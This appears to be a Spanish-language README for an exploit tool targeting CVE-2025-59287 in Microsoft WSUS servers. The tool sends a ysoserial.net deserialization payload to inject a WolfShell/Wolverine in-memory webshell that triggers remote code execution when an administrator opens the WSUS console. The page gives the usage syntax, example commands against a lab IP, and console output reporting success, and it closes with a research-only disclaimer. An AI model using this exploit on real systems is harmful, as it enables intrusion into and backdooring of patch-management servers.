
Exploit para CVE-2025-59287, que inyecta un webshell de memoria WolfShell en servidores WSUS para lograr ejecución remota de código cuando se abre la consola de administración.
CVE-2025-59287 — Inyección de WolfShell Wolverine memory shell directo
CVE-2025-59287 aprovecha una falla lógica en los componentes relacionados con WSUS para inyectar un memory shell de WolfShell en el servidor objetivo. Cuando un administrador abre la consola de WSUS (se activa de forma predeterminada en un tiempo aleatorio de 1 a 30 minutos), el memory shell se activa y provoca la ejecución remota de código (RCE). Este documento incluye ejemplos de explotación, archivos necesarios y recomendaciones de protección.
Envíe el payload de deserialización de ysoserial.net al servidor objetivo, con funcionalidad personalizable. Este proyecto demuestra la inyección del memory shell Wolverine.
Usage: CVE-2025-59287 <target_url> <payload_file>
CVE-2025-59287 http://192.168.50.159:8530 wolfaspx.txt
C:\Users\Administrator\Desktop\>CVE-2025-59287 http://192.168.50.159:8530 wolfshell.txt
[+] Target: http://192.168.50.159:8530/
[+] Payload read successfully, length: 20413 characters
[+] Getting Server ID...
[+] Server ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Auth cookie with Server ID...
[+] Using ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Sending event with payload...
[+] SUCCESS!
[!] RCE will trigger when you open the WSUS console!
[!] to cleanup remove the hawktrace.local computer from WSUS
CVE-2025-59287 http://192.168.50.159:8530 allow7556.txt

win2019 Defender lo bloquea y elimina, no se puede usar

Como se muestra en la imagen, la escucha exitosa en el puerto 7556 indica que el memory shell directo de Wolverine se ha inyectado


Este documento es solo para fines de investigación de seguridad y protección. No utilice el código de explotación relacionado en sistemas no autorizados o actividades de ataque.